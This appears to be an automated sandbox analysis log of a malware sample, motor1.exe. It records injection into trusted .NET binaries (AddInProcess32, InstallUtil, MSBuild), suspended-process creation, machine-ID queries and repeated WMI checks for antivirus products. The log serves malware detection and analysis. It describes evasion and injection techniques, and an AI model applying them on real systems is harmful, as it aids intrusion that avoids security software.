Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: B26008
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 227008
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: DFA008
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: F2D008
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 27C008
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40C000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40E000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: B88008
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 24A008
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40C000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 40E000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40C000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40E000
Source: C:\Users\user\SystemRootDoc\motor1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: AC3008

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Process created: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\SystemRootDoc\motor1.exe "C:\Users\user\SystemRootDoc\motor1.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\SystemRootDoc\motor1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"

Source: conhost.exe, 00000002.00000002.4838867884.0000021A31350000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: motor1.exe, 00000004.00000002.2541006692.0000022D65C00000.00000004.00001000.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2540642308.0000022D6382C000.00000004.00001000.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Progmanh
Source: conhost.exe, 00000002.00000002.4838867884.0000021A31350000.00000002.00000001.00040000.00000000.sdmp, motor1.exe, 00000004.00000002.2541006692.0000022D65C00000.00000004.00001000.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2540642308.0000022D6382C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000002.00000002.4838867884.0000021A31350000.00000002.00000001.00040000.00000000.sdmp, motor1.exe, 00000004.00000002.2541006692.0000022D65C00000.00000004.00001000.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2540642308.0000022D6382C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Progman
Source: conhost.exe, 00000002.00000002.4838867884.0000021A31350000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: motor1.exe, 00000004.00000002.2541006692.0000022D65C00000.00000004.00001000.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2540642308.0000022D6382C000.00000004.00001000.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWndh

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\pKxhpP0spW.exe	Queries volume information: C:\Users\user\Desktop\pKxhpP0spW.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe

Code function: 4_2_00007FF7EDCFB8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

4_2_00007FF7EDCFB8DC

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe

Code function: 4_2_00007FFDA3845EC0 GetUserNameW,GetLastError,GetUserNameW,_invalid_parameter_noinfo_noreturn,

4_2_00007FFDA3845EC0

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: AddInProcess32.exe, 00000005.00000002.4838057286.0000000000BAC000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4844668204.0000000005E92000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4838057286.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
